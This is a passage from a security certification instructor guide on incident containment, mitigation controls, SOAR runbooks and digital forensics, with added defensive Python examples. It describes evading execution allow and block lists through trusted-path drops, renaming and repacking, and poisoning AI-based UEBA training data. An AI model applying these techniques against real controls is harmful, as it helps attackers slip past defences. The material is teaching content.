Answer the following questions:

1. True or False? The first responder is whoever first reports an incident to
the CIRT.

False. The first responder is the member of the CIRT who handles the report.

2. You need to correlate intrusion detection data with web server log files.
What component must you deploy to collect IDS alerts in a SIEM?

You need to deploy a sensor to send network packet captures or intrusion detection
alerts to the SIEM.

3. Which software tool is most appropriate for forwarding Windows event logs
to a Syslog-compatible server?

NXlog is designed as a multi-platform logging system.

4. A technician is seeing high volumes of 403 Forbidden errors in a log. What
type of network appliance or server is producing these logs?

403 Forbidden is an HTTP status code, so most likely a web server. Another possibility
is a web proxy or gateway.

5. What type of data source(s) would you look in for evidence of a suspicious
MTA?

A Message Transfer Agent (MTA) is an SMTP server. You might inspect an SMTP log or
the Internet header metadata of an email message.

6. You are supporting a SIEM deployment at a customer's location. The
customer wants to know whether flow records can be ingested. What type
of data source is a flow record?

Flow records are generated by NetFlow or IP Flow Information Export (IPFIX) probes.
A flow record is data that matches a flow label, which is a particular combination of
keys (IP endpoints and protocol/port types).


Topic 17C
Apply Mitigation Controls

EXAM OBJECTIVES COVERED
1.2 Given a scenario, analyze potential indicators to determine the type of attack
4.4 Given an incident, apply mitigation techniques or controls to secure an environment

Teaching Tip: This topic completes the review of the incident response objectives by
looking at mitigation techniques. We also discuss attacks on AI training data.

Mitigation techniques are applied first to contain, and then to eradicate and recover
from the effects of malicious activity. Incident response is a highly pressured activity,
with the conflicting challenges of eliminating the intrusion without disrupting business
workflows. You must be able to select and apply the appropriate technique for a
given scenario.

Incident Containment
As incidents cover such a wide range of different scenarios, technologies, motivations,
and degrees of seriousness, there is no standard approach to containment or incident
isolation. Some of the many complex issues facing the CIRT are:
• What damage or theft has occurred already? How much more could be inflicted and
in what sort of time frame (loss control)?
• What countermeasures are available? What are their costs and implications?
• What actions could alert the attacker to the fact that the attack has been detected?
What evidence of the attack must be gathered and preserved?

Teaching Tip: Note that containment strategies can be influenced by the need to
preserve forensic evidence.

When an incident has been identified, classified, and prioritized, the next phase of
incident response is containment. Containment techniques can be classed as either
isolation-based or segmentation-based.

Isolation-Based Containment
Isolation involves removing an affected component from whatever larger environment
it is a part of. This can be everything from removing a server from the network after it
has been the target of a DoS attack, to placing an application in a sandbox VM outside
of the host environments it usually runs on. Whatever the circumstances may be,
you'll want to make sure that there is no longer an interface between the affected
component and your production network or the Internet.
A simple option is to disconnect the host from the network completely, either by
pulling the network plug (creating an air gap) or disabling its switch port. This is the
least stealthy option and will reduce opportunities to analyze the attack or malware; it
also discards volatile evidence such as the host's active network connections, so capture
memory first if the host is to be examined forensically.
If a group of hosts is affected, you could use routing infrastructure to isolate one or
more infected virtual LANs (VLANs) in a black hole that is not reachable from the rest
of the network. Another possibility is to use firewalls or other security filters to prevent
infected hosts from communicating.
Finally, isolation could also refer to disabling a user account or application service.
Temporarily disabling users' network accounts may prove helpful in containing damage
if an intruder is detected within the network. Without privileges to access resources, an
intruder will not be able to further damage or steal information from the organization.


Applications that you suspect may be the vector of an attack can be made much less useful
to the attacker if the application is prevented from executing on most hosts.

Segmentation-Based Containment
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture. Segmentation uses
VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from
communicating outside the protected segment. As opposed to completely isolating the
hosts, you might configure the protected segment as a sinkhole or honeynet and allow
the attacker to continue to receive filtered and possibly modified output over the
C&C channel to deceive them into thinking the attack is progressing successfully.
Analysis of the malware code by reverse engineering it could provide powerful
deception capabilities. You could intercept the function calls made by malware to allow
the adversary to believe an attack is proceeding while building detailed knowledge of
their tactics and (hopefully) identity. Attribution of the attack to a particular group will
allow an estimation of adversary capability.

Incident Eradication and Recovery
After an incident has been contained, you can apply mitigation techniques and controls
to eradicate the intrusion tools and unauthorized configuration changes from your
systems. Eradicating malware, backdoors, and compromised accounts from individual
hosts is not the last step in incident response. You should also consider a recovery
phase where the goal is restoration of capabilities and services. This means that hosts
are fully reconfigured to operate the business workflow they were performing before
the incident. An essential part of recovery is the process of ensuring that the system
cannot be compromised through the same attack vector (or failing that, that the vector
is closely monitored to provide advance warning of another attack).
Eradication of malware or other intrusion mechanisms and recovery from the attack
will involve several steps:
1. Reconstitution of affected systems: either remove the malicious files or tools
from affected systems or restore the systems from secure backups/images.

If reinstalling from baseline template configurations or images, make sure that there is
nothing in the baseline that allowed the incident to occur. If so, update the template before
rolling it out again. Likewise, a backup taken after the initial compromise will restore the
attacker's persistence along with the data, so establish the date of intrusion first.

2. Reaudit security controls: ensure they are not vulnerable to another attack. This
could be the same attack or some new attack that the attacker could launch
through information they have gained about your network.

If your organization is subjected to a targeted attack, be aware that one incident may be
very quickly followed by another.

3. Ensure that affected parties are notified and provided with the means to
remediate their own systems. For example, if customers' passwords are stolen,
they should be advised to change the credentials for any other accounts where
that password might have been used (not good practice, but most people do it).

Firewall Configuration Changes
Analysis of an attack should identify the vector exploited by the attacker. This analysis
is used to identify configuration changes that block that attack vector. A configuration
change may mean the deployment of a new type of security control, or altering the
settings of an existing control to make it more effective.
Historically, many organizations focused on ingress filtering rules, designed to
prevent local network penetration from the Internet. In the current threat landscape,
it is imperative to also apply strict egress filtering rules to prevent malware that has
infected internal hosts by other means from communicating out to C&C servers. Egress
filtering can be problematic in terms of interrupting authorized network activity, but it
is an essential component of modern network defense. Some general guidelines for
configuring egress filtering are:
• Allow only authorized application ports and, if possible, restrict the destination
addresses to authorized Internet hosts. Where authorized hosts cannot be
identified or a default deny is too restrictive, use URL and content filtering to try to
detect malicious traffic over authorized protocols.
• Restrict DNS lookups to your own or your ISP's DNS services or authorized public
resolvers, such as Google's or Quad9's DNS services.
• Block access to "known bad" IP address ranges, as listed on don't route or peer
(DROP) filter lists.
• Block access from any IP address space that is not authorized for use on your
local network.
• Block all Internet access from host subnets that do not need to connect to the
Internet, such as most types of internal server, workstations used to manage
industrial control systems (ICSs), and so on.

Even within these rules, there is a lot of scope for threat actors to perform command
signaling and exfiltration. For example, cloud services, such as content delivery
networks and social media platforms, can be used to communicate scripts and
malware commands and to exfiltrate data over HTTPS (rhinosecuritylabs.com/aws/
hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis). Log denied egress attempts as
well as blocking them: a workstation repeatedly trying to reach an unauthorized resolver
or an unlisted port is itself a useful indicator of compromise.
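As an added example (not code from the guide), this Python encodes the egress guidelines above as a first-match decision function and applies it to connection attempts, returning the reason for each verdict so that denials can be logged as indicators. All networks, resolver addresses, service entries, and the DROP range are assumed values chosen for illustration (the real DROP list is a published feed); the function names are the example's own.

```python
"""Evaluate outbound connections against an egress filtering policy.

Added example, not from the guide: a decision function that encodes the egress
guidelines. All networks, resolvers, and list entries are assumed values; the
DROP_LIST entry is a constructed stand-in for a real DROP feed.
"""
import ipaddress

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]           # address space we own
NO_INTERNET_SUBNETS = [ipaddress.ip_network("10.20.0.0/16")]   # ICS management, internal servers
AUTHORIZED_RESOLVERS = {ipaddress.ip_address(a) for a in ("10.0.0.53", "9.9.9.9", "8.8.8.8")}
DROP_LIST = [ipaddress.ip_network("192.0.2.0/24")]             # "known bad" ranges
# (proto, port) -> set of permitted destinations, or None for any Internet host
ALLOWED_SERVICES = {
    ("tcp", 443): None,
    ("tcp", 80): None,
    ("tcp", 25): {ipaddress.ip_address("203.0.113.25")},       # only our mail relay may take SMTP
}


def _in(addr, nets):
    return any(addr in n for n in nets)


def egress_decision(src, dst, proto, dport):
    """Return (action, reason) for one connection attempt; first matching rule wins."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if not _in(src, INTERNAL_NETS):
        return "DENY", "source address not authorized on the local network"
    if _in(dst, INTERNAL_NETS):
        return "ALLOW", "internal destination, not subject to egress policy"
    if _in(src, NO_INTERNET_SUBNETS):
        return "DENY", "subnet has no business need for Internet access"
    if _in(dst, DROP_LIST):
        return "DENY", "destination is on the DROP list"
    if dport == 53:
        if dst in AUTHORIZED_RESOLVERS:
            return "ALLOW", "DNS to an authorized resolver"
        return "DENY", "DNS to an unauthorized resolver"
    permitted = ALLOWED_SERVICES.get((proto, dport), "unlisted")
    if permitted == "unlisted":
        return "DENY", f"{proto}/{dport} is not an authorized application port"
    if permitted is not None and dst not in permitted:
        return "DENY", f"{proto}/{dport} is restricted to authorized hosts"
    return "ALLOW", f"{proto}/{dport} is an authorized application port"


def audit(connections):
    """Apply the policy to (src, dst, proto, dport) records. Denied attempts are
    evidence in their own right, so they are returned, not silently dropped."""
    return [(c, *egress_decision(*c)) for c in connections]


def denied(connections):
    return [entry for entry in audit(connections) if entry[1] == "DENY"]
```

Note the rule order: anti-spoofing (source must be your own address space) comes first, DNS is handled before the generic port table so that port 53 cannot be opened to arbitrary hosts by accident, and anything not listed falls through to a deny.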

Content Filter Configuration Changes
The limitations of a basic packet filtering firewall (even if it is stateful) mean that some
sort of content filtering application proxy may provide better security. These types of
appliances are usually referred to as secure web gateways (SWGs). A SWG mediates
user access to Internet services, with the ability to block content from regularly
updated URL/domain/IP block lists and perform intrusion detection/prevention on
traffic based on matching content in application layer protocol headers and payloads.
If a SWG is already in place, an attacker may have found a way to circumvent it via
some sort of backdoor. The network configuration should be checked and updated
to ensure that all client access to the Internet must pass through the SWG. Another
possibility is that the attacker is using a protocol or C&C method that is not filtered.
The SWG should be updated with scripts and data, domains and IP addresses, that will
block the exploit.

Data Loss Prevention (DLP)
Data loss prevention (DLP) performs a similar function, but instead of user access it
mediates the copying of tagged data to restrict it to authorized media and services. An
attack may reveal the necessity of investing in DLP as a security control if one is not
already implemented. If DLP is enabled and configured in the correct way to enforce
policy, the attacker may have been able to circumvent it using a backdoor method
that the DLP software cannot scan, such as an encrypted or compressed container.
Alternatively, the attacker may have been able to disguise the data so that it was not
recognized.


Mobile Device Management (MDM)
Mobile Device Management (MDM) provides execution control over apps and features
of smartphones. Features include GPS, camera, and microphone. As with DLP, an
intrusion might reveal a vector that allowed the threat actor to circumvent enrollment
or a misconfiguration in the MDM's policy templates.

Update or Revoke Certificates
Compromise of the private key represented by a digital certificate or the ability to
present spoofed certificates as trusted is a critical security vulnerability as it allows an
attacker to impersonate trusted resources and potentially gain unauthorized access to
secure systems.
• Remove compromised root certificates: if an attacker has managed to install a
root certificate, the attacker can make malicious hosts and services seem trusted.
Suspicious root certificates must be removed from the client's trust store.
• Revoke certificates on compromised hosts: if a host is compromised, the private
key it used for digital signatures or digital envelopes is no longer safe. The certificate
associated with the key should be revoked using the Key Compromise reason code,
so that relying parties checking the CRL or an OCSP responder reject it. The certificate
can be reissued with a new key pair but the same subject and expiry information.

Endpoint Configuration Changes
If endpoint security is breached, there are several classes of vector to consider for
mitigation:
• Social engineering: if the malware was executed by a user, use security education
and awareness to reduce the risk of future attacks succeeding. Review permissions
to see if the account could be operated with a lower privilege level.
• Vulnerabilities: if the malware exploited a software fault, either install the patch or
isolate the system until a patch can be developed.
• Lack of security controls: if the attack could have been prevented by endpoint
protection/A-V, host firewall, content filtering, DLP, or MDM, investigate the
possibility of deploying them to the endpoint. If this is not practical, isolate the
system from being exploited by the same vector.
• Configuration drift: if the malware exploited an undocumented configuration
change (shadow IT software or an unauthorized service/port, for instance), reapply
the baseline configuration and investigate configuration management procedures
to prevent this type of ad hoc change.
• Weak configuration: if the configuration was correctly applied, but was exploited
anyway, review the template to devise more secure settings. Make sure the
template is applied to similar hosts.

Application Allow Lists and Block Lists
One element of endpoint configuration is an execution control policy that defines
applications that can or cannot be run.
• An allow list or approved list denies execution unless the process is explicitly
authorized.
• A block list or deny list generally allows execution, but explicitly prohibits listed
processes.
You will need to update the contents of allow lists and block lists in response to
incidents and as a result of ongoing threat hunting and monitoring. Threat hunting
may also provoke a strategic change. For example, if you rely principally on explicit
denies, but your systems are subject to numerous intrusions, you will have to consider
adopting a "least privileges" model and using a deny-unless-listed approach. This sort
of change has the potential to be highly disruptive however, so it must be preceded by
a risk assessment and business impact analysis.
Execution control can also be tricky to configure effectively, with many opportunities
for threat actors to evade the controls. Rules that match on file path or name alone are
defeated by copying a binary into a trusted location or renaming it; rules that match on
a file hash are defeated by recompiling or repacking the binary; rules that match on a
trusted publisher signature are the most robust, but still fail if a signing key is stolen.
Detailed analysis of the attack might show the need for changes to the existing
mechanism, or the use of a more robust system.
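As an added example (not code from the guide), this Python implements the two execution control modes side by side and runs the same four execution attempts against each, matching either by file hash or by path, to show which evasions each combination misses. The "executables" are constructed byte strings standing in for files on disk, and the list contents and paths are assumed values; a production control would hash the real file and would usually also check its Authenticode signature.

```python
"""Execution control: allow list vs block list, and how matching criteria are evaded.

Added example, not from the guide. File contents and paths are constructed stand-ins;
a real control would hash the executable on disk and check its publisher signature.
"""
import hashlib


def sha256(data):
    return hashlib.sha256(data).hexdigest()


# constructed "executables"
NOTEPAD = b"MZ\x90\x00 notepad build 1"
MALWARE = b"MZ\x90\x00 dropper build 1"
MALWARE_REPACKED = b"MZ\x90\x00 dropper build 2"   # same tool, recompiled/packed

ALLOW_LIST = {"hash": {sha256(NOTEPAD)}, "path": {r"c:\windows\system32\notepad.exe"}}
BLOCK_LIST = {"hash": {sha256(MALWARE)}, "path": {r"c:\users\public\dropper.exe"}}


def _listed(rules, path, content, criterion):
    if criterion == "hash":
        return sha256(content) in rules["hash"]
    if criterion == "path":
        return path.lower() in rules["path"]       # NTFS paths are case-insensitive
    raise ValueError(criterion)


def decide(mode, path, content, criterion="hash", allow=ALLOW_LIST, block=BLOCK_LIST):
    """'allow_list': deny unless listed. 'block_list': allow unless listed."""
    if mode == "allow_list":
        return "ALLOW" if _listed(allow, path, content, criterion) else "DENY"
    if mode == "block_list":
        return "DENY" if _listed(block, path, content, criterion) else "ALLOW"
    raise ValueError(mode)


# the attempts a responder should try against a proposed policy
CASES = {
    "legit notepad":      (r"C:\Windows\System32\notepad.exe", NOTEPAD),
    "malware as notepad": (r"C:\Windows\System32\notepad.exe", MALWARE),   # dropped into a trusted path
    "malware renamed":    (r"C:\Users\Public\svchost.exe", MALWARE),       # known binary, new name
    "malware repacked":   (r"C:\Users\Public\dropper.exe", MALWARE_REPACKED),
}


def evaluate_policy(mode, criterion):
    """Verdict for every case under one mode/criterion combination."""
    return {name: decide(mode, path, content, criterion)
            for name, (path, content) in CASES.items()}


def evasions(mode, criterion):
    """Cases where malware was allowed to run under this policy."""
    return sorted(name for name, verdict in evaluate_policy(mode, criterion).items()
                  if name != "legit notepad" and verdict == "ALLOW")
```

Hash-based allow listing is the only combination with no evasions in this set; path-based allow listing lets the dropped-in binary run, hash-based block listing misses the repacked sample, and path-based block listing misses everything except the one path it names.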

Quarantine
If mitigating techniques are not successful, or the results are uncertain, the endpoint
will require careful management before being integrated back onto the network. If
further evidence needs to be gathered, the best approach may be to quarantine or
sandbox the endpoint or suspect process/file. This allows for analysis of the attack or
tool and collection of evidence using digital forensic techniques.

Security Orchestration, Automation, and Response
Automation is the action of scripting a single activity, while orchestration is the action of
coordinating multiple automations (and possibly manual activity) to perform a complex,
multistep task. In the case of security orchestration, automation, and response
(SOAR), this task is principally incident response, though the technologies can also be
used for tasks such as threat hunting too. SOAR is designed as a solution to the problem
of the volume of alerts overwhelming analysts' ability to respond, measured as the
mean time to respond (MTTR). A SOAR may be implemented as a standalone technology
or integrated with a SIEM, often referred to as a next-gen SIEM. The basis of SOAR
is to scan the organization's store of security and threat intelligence, analyze it using
machine/deep learning techniques, and then use that data to automate and provide data
enrichment for the workflows that drive incident response and threat hunting. It can also
assist with provisioning tasks, such as creating and deleting user accounts, making shares
available, or launching VMs from templates, to try to eliminate configuration errors. The
SOAR will use technologies such as cloud and SDN/SDV APIs, orchestration tools, and
cyberthreat intelligence (CTI) feeds to integrate the different systems that it is managing.
It will also leverage technologies such as automated malware signature creation and user
and entity behavior analytics (UEBA) to detect threats.
An incident response workflow is usually defined as a playbook. A playbook is a
checklist of actions to perform to detect and respond to a specific type of incident. A
playbook should be made highly specific by including the query strings and signatures
that will detect a particular type of incident. A playbook will also account for compliance
factors, such as whether an incident must be reported as a breach plus when and
to whom notification must be made. Where a playbook is implemented with a high
degree of automation from a SOAR system, it can be referred to as a runbook, though
the terms are also widely used interchangeably. The aim of a runbook is to automate
as many stages of the playbook as possible, leaving clearly defined interaction points
for human analysis. These interaction points should try to present all the contextual
information and guidance needed for the analyst to make a quick, informed decision
about the best way to proceed with incident mitigation.

Rapid7 have produced an ebook demonstrating the uses of SOAR (rapid7.com/info/
security-orchestration-and-automation-playbook). A white paper by Demisto, "The State
of SOAR," provides a useful overview of the role of SOAR across different organizations.
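As an added example (not code from the guide or from any SOAR product), this Python sketches the runbook pattern described above: a playbook is an ordered list of step functions, each either completing automatically or pausing the run at an interaction point; when the analyst records a decision, re-running the playbook resumes from the gated step. The threat intelligence feed and asset inventory are constructed in-memory stand-ins for the CTI and EDR APIs a real SOAR would call, and every name here is the example's own.

```python
"""A minimal runbook: automated enrichment and containment with an analyst gate.

Added example, not from the guide. CTI_FEED and INVENTORY are constructed
stand-ins for a threat intelligence lookup and an asset/EDR API; the step
functions change that in-memory state where a SOAR would call the real APIs.
"""
import copy
import hashlib

MALICIOUS_HASH = hashlib.sha256(b"constructed malware sample").hexdigest()
CTI_FEED = {MALICIOUS_HASH: {"malicious": True, "family": "constructed-dropper"}}
INVENTORY = {
    "ws-101": {"critical": False, "isolated": False, "user": "jdoe", "user_disabled": False},
    "db-01":  {"critical": True,  "isolated": False, "user": "svc-db", "user_disabled": False},
}


def new_incident(host, file_hash):
    return {"host": host, "sha256": file_hash, "status": "new",
            "decisions": {}, "done": [], "audit": []}


def enrich(inc, ctx):
    """Automated: look the indicator up in threat intelligence."""
    hit = ctx["cti"].get(inc["sha256"])
    inc["audit"].append(f"enrich: {inc['sha256'][:12]} -> {hit or 'unknown'}")
    if hit is None:                                # no verdict: never act blindly
        inc["status"] = "awaiting_analyst"
        inc["audit"].append("gate: unknown indicator, analyst triage required")
        return False
    if not hit["malicious"]:
        inc["status"] = "closed_benign"
        return False
    return True


def assess(inc, ctx):
    """Automated: isolating a critical asset is a business decision, so gate it."""
    asset = ctx["inventory"][inc["host"]]
    inc["audit"].append(f"assess: {inc['host']} critical={asset['critical']}")
    if asset["critical"] and "isolate" not in inc["decisions"]:
        inc["status"] = "awaiting_analyst"
        inc["audit"].append("gate: critical asset, analyst must approve isolation")
        return False
    return True


def contain(inc, ctx):
    """Automated (or analyst-approved): isolate the host and disable the account."""
    asset = ctx["inventory"][inc["host"]]
    if inc["decisions"].get("isolate", True):
        asset["isolated"] = True
        asset["user_disabled"] = True
        inc["audit"].append(f"contain: isolated {inc['host']}, disabled {asset['user']}")
        inc["status"] = "contained"
    else:
        inc["audit"].append("contain: analyst declined isolation, monitoring instead")
        inc["status"] = "monitoring"
    return True


PLAYBOOK = [enrich, assess, contain]


def run_playbook(inc, ctx):
    """Run the remaining steps in order. A step returning False pauses the runbook
    at an interaction point; re-running after a decision is recorded resumes it."""
    inc["status"] = "running"
    for step in PLAYBOOK:
        if step.__name__ in inc["done"]:
            continue
        if not step(inc, ctx):
            return inc
        inc["done"].append(step.__name__)
    return inc


def demo_context():
    return {"cti": CTI_FEED, "inventory": copy.deepcopy(INVENTORY)}
```

The audit trail in `inc["audit"]` is what the analyst sees at the interaction point: the enrichment result and the asset's criticality, which is the contextual information the passage says a runbook must surface before asking for a decision.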


Adversarial Artificial Intelligence
Artificial Intelligence (AI)-type systems are used extensively for user and entity behavior
analytics (UEBA). A UEBA is trained on security data from customer systems and
honeypots. This allows the AI to determine features of malicious code and account
activity and to recognize those features in novel data streams. To make use of UEBA,
host event data and network traffic is streamed to a cloud-based analytics service. An
attacker with undetected persistent access to the network, but with a low probability of
effecting lateral movement or data exfiltration, may be in a position to inject traffic into
this data stream with a long-term goal of concealing tools that could achieve actions on
objectives. The attacker may use their own AI resources as a means of generating
samples, hence adversarial AI. Manipulated samples could also be uploaded to public
repositories, such as virustotal.com.
For example, ML algorithms are highly sensitive to noise. This is demonstrated in image
recognition cases, where given a doctored image of a turtle, an AI will identify it as a
rifle (theregister.com). To a human observer, the image appears to be that of a perfectly
ordinary turtle. Similar techniques might be used to cause an AI to miscategorize an
attack tool as a text editor.
Successful adversarial attacks mostly depend on knowledge of the algorithms used
by the target AI. This is referred to as a white box attack. Keeping those algorithms
secret forces the adversarial AI to use black box techniques, which are more difficult
to develop. Algorithm secrecy is security by obscurity, however, and difficult to ensure.
Other solutions include generating adversarial examples and training the system
to recognize them (adversarial training). Another option is to develop a filter that can
detect and block adversarial samples as they are submitted.

A Microsoft presentation at Black Hat USA, "Protecting the Protector: Hardening Machine
Learning Defenses Against Adversarial Attacks," illustrates some of the techniques that
can be used to mitigate adversarial AI (i.blackhat.com).


Review Activity:
Mitigation Controls
Answer the following questions:

1. What low-level networking feature will facilitate a segmentation-based
approach to containing intrusion events?

Network segmentation is primarily achieved by virtual LANs (VLANs). A VLAN can be
isolated from the rest of the network.

2. What configuration change could you make to prevent misuse of a
developer account?

Disable the account.

3. Following a loss of critical PII exfiltrated from the local network to a public
cloud storage network, you decide to implement a type of outbound
filtering system. Which technology is most suitable for implementing the
filter?

This task is suited to data loss prevention (DLP), which can block the transfer of tagged
content over unauthorized channels.

4. A threat actor gained access to a remote network over a VPN. Later, you
discover footage of the user of the hacked account being covertly filmed
while typing their password. What type of endpoint security solution might
have prevented this breach?

A mobile device management (MDM) suite can prevent use of the camera function of a
smartphone.

5. True or false? SOAR is intended to provide wholly automated incident
response solutions.

False. Incident response is too complex to be wholly automated. SOAR assists the
provision of runbooks, which orchestrate the sequence of response and automate
parts of it, but still require decision-making from a human responder.

6. You are investigating a client workstation that has not obtained updates to
its endpoint protection software for days. On the workstation you discover
thousands of executable files with random names. The local endpoint log
reveals that all of them have been scanned and identified as malware. You
can find no evidence of any further intrusion on the network. What is the
likely motive of the threat actor?

This could be an offline tainted data attack against the endpoint software's
identification engine.


Lesson 17
Summary
You should be able to explain the process and procedures involved in effective incident
response and implement strategies to remediate intrusion events.

Teaching Tip: Check that students are confident about the content that has been covered.
If there is time, revisit any content examples that they have questions about. If you have
used all the available time for this lesson block, note the issues, and schedule time for a
review later in the course.

Interaction Opportunity: Use this as an opportunity for students to share their real-world
experiences with security incidents. You may also encourage them to brainstorm
appropriate responses to hypothetical scenarios. Consider recording the incidents and
responses for review, and present additional content to see if students would want to
change the responses they provided.

Guidelines for Performing Incident Response
Follow these guidelines for developing or improving incident response policies and
procedures:
• Identify goals for implementing structured incident response, following the
preparation, identification, containment, eradication, recovery, and lessons
learned steps.

• Prepare for effective incident response by creating a CIRT/CSIRT/CERT with suitable
communications resources and policies.

• Develop an incident classification system and prepare IRPs and playbooks for
distinct incident scenarios, using attack frameworks (kill chain, Diamond Model, and
MITRE ATT&CK) to facilitate analysis.

• Consider whether implementing SOAR and automated runbooks could provide
more effective response, taking care to protect AI-backed systems from tainted
training data attacks.

• Configure SIEM or syslog to aggregate appropriate data sources and develop
correlation rules; display alerts, status indicators, and trend analysis via dashboards:

• Host log file data sources (network, system, security, vulnerability scan output).

• Application log file data sources (DNS, web, VoIP).

• Network packet and intrusion detection data.

• Network traffic and protocol flow statistics.

• Integrate incident response containment, eradication, and recovery processes
with procedures for forensic evidence collection, disaster recovery, and business
continuity.

• Identify standard strategies for containment via isolation and segmentation.

• Ensure that the recovery process applies necessary configuration changes to
firewalls, content filters, MDM, DLP, certificate security, and endpoint application
control.

Lesson 18
Explaining Digital Forensics

LESSON INTRODUCTION
Where incident response emphasizes the swift eradication of malicious activity,
digital forensics requires patient capture, preservation, and analysis of evidence using
verifiable methods. You may be called on to assist with an investigation into the details
of a security incident and to identify threat actors. To assist these investigations, you
must be able to summarize the basic concepts of collecting and processing forensic
evidence that could be used in legal action or for strategic counterintelligence.

Teaching Tip: Forensics follows on from incident response, but note the difference in
approach.

Lesson Objectives
In this lesson, you will:
• Explain key aspects of digital forensics documentation.

• Explain key aspects of digital forensics evidence acquisition.


Topic 18A
Explain Key Aspects of Digital Forensics Documentation

EXAM OBJECTIVES COVERED
4.5 Explain the key aspects of digital forensics

Teaching Tip: The first topic focuses on the documentation/evidence content examples.
This content is quite straightforward, so hopefully you should not need to spend much
time on this topic.

Documentation is critical to collecting, preserving, and presenting valid digital proofs.
Mistakes or gaps in the record of the process can lead to the evidence being dismissed.
You should be able to explain key aspects of forensics documentation so that you give
effective assistance to investigators.

Key Aspects of Digital Forensics
Show Slide(s): Key Aspects of Digital Forensics

Digital forensics is the practice of collecting evidence from computer systems to a
standard that will be accepted in a court of law. Forensics investigations are most likely
to be launched against crimes arising from insider threats, notably fraud or misuse
of equipment (to download or store obscene material, for instance). Prosecuting
external threat sources is often difficult, as the threat actor may well be in a different
country or have taken effective steps to disguise his or her location and identity. Such
prosecutions are normally initiated by law enforcement agencies, where the threat is
directed against military or governmental agencies or is linked to organized crime.

Teaching Tip: Discuss why digital forensics techniques might be used even if no criminal
prosecution is planned. Stress that the same standards of evidence collection must be
applied, even if the investigation is a purely internal one.

Evidence, Documentation, and Admissibility
Like DNA or fingerprints, digital evidence is latent. Latent means that the evidence
cannot be seen with the naked eye; rather, it must be interpreted using a machine or
process. This means that great care must be taken to ensure the admissibility of digital
evidence. As well as the physical evidence (a hard drive, for instance), digital forensics
requires documentation showing how the evidence was collected and analyzed without
tampering or bias.
Due process is a term used in US and common law to require that people only
be convicted of crimes following the fair application of the laws of the land. More
generally, due process can be understood to mean having a set of procedural
safeguards to ensure fairness. This principle is central to forensic investigation. If
a forensic investigation is launched (or if one is a possibility), it is important that
technicians and managers are aware of the processes that the investigation will use.
It is vital that they are able to assist the investigator and that they not do anything
to compromise the investigation. In a trial, defense counsel will try to exploit any
uncertainty or mistake regarding the integrity of evidence or the process of collecting it.
The first response period following detection and notification is often critical. To
gather evidence successfully, it is vital that staff do not panic or act in a way that would
compromise the investigation.


Legal Hold
Legal hold refers to the fact that information that may be relevant to a court case
must be preserved. Information subject to legal hold might be defined by regulators
or industry best practice, or there may be a litigation notice from law enforcement or
lawyers pursuing a civil action. This means that computer systems may be taken as
evidence, with all the obvious disruption to a network that entails.

Chain of Custody
Chain of custody documentation reinforces the integrity and proper handling of
evidence from collection, to analysis, to storage, and finally to presentation. When
security breaches go to trial, the chain of custody protects an organization against
accusations that evidence has either been tampered with or is different than it was
when it was collected. Every person in the chain who handles evidence must log the
methods and tools they used.

Digital Forensics Reports
Show Slide(s): Digital Forensics Reports

A digital forensics report summarizes the significant contents of the digital data and the
conclusions from the investigator's analysis. It is important to note that strong ethical
principles must guide forensics analysis.
• Analysis must be performed without bias. Conclusions and opinions should be
formed only from the direct evidence under analysis.

• Analysis methods must be repeatable by third parties with access to the same
evidence.

• Ideally, the evidence must not be changed or manipulated. If a device used as
evidence must be manipulated to facilitate analysis (disabling the lock feature of a
mobile phone or preventing a remote wipe, for example), the reasons for doing so
must be sound and the process of doing so must be recorded.

Defense counsel may try to use any deviation from good ethical and professional behavior
to have the forensics investigator's findings dismissed.

E-Discovery
Show Slide(s): E-Discovery

A forensic examination of a device such as a fixed drive that contains Electronically
Stored Information (ESI) entails a search of the whole drive (including both allocated
and unallocated sectors, for instance). E-discovery is a means of filtering the relevant
evidence produced from all the data gathered by a forensic examination and storing
it in a database in a format such that it can be used as evidence in a trial. E-discovery
software tools have been produced to assist this process. Some of the functions of
e-discovery suites are:
• Identify and de-duplicate files and metadata: many files on a computer system are
standard installed files or copies of the same file. E-discovery filters these types of
files, reducing the volume of data that must be analyzed.

• Search: allow investigators to locate files of interest to the case. As well as keyword
search, software might support semantic search. Semantic search matches
keywords if they correspond to a particular context.

• Tags: apply standardized keywords or labels to files and metadata to help organize
the evidence. Tags might be used to indicate relevancy to the case or part of the
case or to show confidentiality, for instance.


• Security: at all points, evidence must be shown to have been stored, transmitted,
and analyzed without tampering.

• Disclosure: an important part of trial procedure is that the same evidence be made
available to both plaintiff and defendant. E-discovery can fulfill this requirement.
Recent court cases have required parties to a court case to provide searchable ESI
rather than paper records.
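The de-duplication, known-file filtering, and tagging functions listed above can be illustrated with a small hash-based pipeline. This is an added example written for this guide, not code from any e-discovery product; the drive contents, the "known file" hash set, and the tag rules are all constructed sample data, and the hash library stands in for the reference sets of standard installed files that commercial suites ship with.

```python
import hashlib
from collections import defaultdict

# Constructed sample of a drive's contents (path -> bytes). Not evidence from any real case.
SAMPLE_FILES = {
    "C:/Windows/System32/notepad.exe": b"MZ\x90\x00 standard OS binary",
    "C:/Users/alice/Desktop/notepad.exe": b"MZ\x90\x00 standard OS binary",  # stray copy of the OS file
    "C:/Users/alice/Documents/budget.xlsx": b"PK\x03\x04 invoice payment vendor account 0042",
    "C:/Users/alice/Documents/budget (copy).xlsx": b"PK\x03\x04 invoice payment vendor account 0042",
    "C:/Users/alice/Documents/notes.txt": b"Met with the vendor about delivery dates.",
    "C:/Users/alice/Pictures/cat.jpg": b"\xff\xd8\xff holiday photo",
}

# Constructed "known file" hash set, standing in for a reference library of standard installed files.
KNOWN_FILE_HASHES = {hashlib.sha256(b"MZ\x90\x00 standard OS binary").hexdigest()}

# Constructed tagging rules: tag -> keywords that mark a file as relevant to that part of the case.
TAG_RULES = {"financial": [b"invoice", b"payment"], "vendor": [b"vendor"]}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def deduplicate(files):
    """Group paths by content hash; keep the first path per hash, report the rest as duplicates."""
    by_hash = defaultdict(list)
    for path, data in files.items():
        by_hash[sha256_hex(data)].append(path)
    unique = {digest: paths[0] for digest, paths in by_hash.items()}
    duplicates = {digest: paths[1:] for digest, paths in by_hash.items() if len(paths) > 1}
    return unique, duplicates


def filter_known(unique, known_hashes):
    """Drop files whose hash matches the known-file library (standard installed files)."""
    return {digest: path for digest, path in unique.items() if digest not in known_hashes}


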